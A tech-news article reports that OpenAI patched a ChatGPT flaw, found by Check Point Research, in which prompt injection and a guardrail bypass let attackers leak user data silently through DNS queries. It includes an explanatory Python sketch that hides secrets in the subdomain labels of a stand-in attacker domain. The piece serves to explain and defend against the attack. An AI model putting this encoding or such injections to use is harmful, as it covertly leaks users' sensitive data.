‘A hard truth for the AI era: don’t assume AI tools are secure by default’: OpenAI patches flaw allowing silent data leakage from ChatGPT conversations without users ever knowing



  • Check Point Research found ChatGPT flaw enabling silent data exfiltration via DNS abuse and prompt injection
  • Vulnerability allowed attackers to bypass guardrails and steal sensitive user data through covert domain queries
  • OpenAI patched issue on Feb 20, 2026, marking second major fix that week after Codex command injection flaw

OpenAI has addressed a vulnerability in ChatGPT that allowed threat actors to silently exfiltrate sensitive data from their targets.

The vulnerability was discovered by security experts from Check Point Research (CPR), who warned that the bug combined old-fashioned prompt injection with a bypass of built-in guardrails, noting, “AI tools should not be assumed secure by default”.
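To make the technique concrete: DNS-based exfiltration typically works by smuggling stolen data into the subdomain labels of an attacker-controlled domain, so that merely resolving the hostname leaks the data to the attacker's nameserver, with no direct outbound connection required. The sketch below is an illustration of that general pattern only, not CPR's actual exploit; the domain name and function names are hypothetical.

```python
# Illustrative sketch of DNS-label exfiltration encoding (NOT the actual
# ChatGPT exploit). The attacker domain "evil.example" is hypothetical.

def encode_for_dns(secret: bytes, attacker_domain: str = "evil.example") -> str:
    """Hex-encode data and split it into DNS labels (max 63 chars each).

    Resolving the returned hostname delivers `secret` to whoever runs the
    authoritative nameserver for `attacker_domain` -- the covert channel.
    """
    hexed = secret.hex()
    labels = [hexed[i:i + 63] for i in range(0, len(hexed), 63)]
    return ".".join(labels + [attacker_domain])


def decode_from_dns(hostname: str, attacker_domain: str = "evil.example") -> bytes:
    """Recover the original data from a query name seen in the DNS logs."""
    suffix = "." + attacker_domain
    if not hostname.endswith(suffix):
        raise ValueError("unexpected domain")
    hexed = hostname[: -len(suffix)].replace(".", "")
    return bytes.fromhex(hexed)


# Example: a leaked credential becomes an innocuous-looking lookup.
query = encode_for_dns(b"api_key=s3cret")
print(query)  # e.g. "6170695f6b65793d733363726574.evil.example"
```

Defenders can spot this pattern by flagging unusually long or high-entropy subdomain labels in outbound DNS traffic, which is one reason the silent nature of this flaw was notable.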


The post ‘A hard truth for the AI era: don’t assume AI tools are secure by default’: OpenAI patches flaw allowing silent data leakage from ChatGPT conversations without users ever knowing first appeared on TechToday.
